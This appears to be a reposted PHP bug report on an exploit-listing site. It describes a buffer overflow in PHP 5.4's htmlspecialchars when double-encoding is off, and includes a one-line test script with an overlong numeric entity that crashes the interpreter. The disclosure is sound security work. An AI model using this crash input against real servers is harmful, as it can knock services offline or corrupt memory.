PHP 5.4 Buffer Overflow

Posted on 04 February 2012

From: cataphract Operating system: Any PHP version: 5.4SVN-2012-02-03 (SVN) Package: Reproducible crash Bug Type: Bug Bug description:Buffer overflow on htmlspecialchars/entities with $double=false Description: ------------ Long entities can cause a buffer overflow because the loop only guarantees 40 bytes available in beginning. Test script: --------------- <?php echo htmlspecialchars('"""""""""""""""""""""""""""""""""""""""""""""&#x000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000005;', ENT_QUOTES, 'UTF-8', false), " ";

TOP

Malware :

RATDispenser
whispergate
Borat RAT
Trojanized X_Trader
BlackLotus

Last 20

Exploits :

Online Tours And Travels Management System 1.0 SQL Injection
osCommerce 4 Cross Site Scripting
ESET NOD32 Antivirus 17.1.11.0 Unquoted Service Path
Doctor Appointment Management System 1.0 Cross Site Scripting
Kemp LoadMaster Unauthenticated Command Injection

Last 20